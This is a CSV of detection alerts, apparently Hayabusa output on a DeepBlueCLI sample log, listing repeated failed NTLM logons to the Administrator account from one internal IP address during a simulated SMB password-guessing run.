+2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
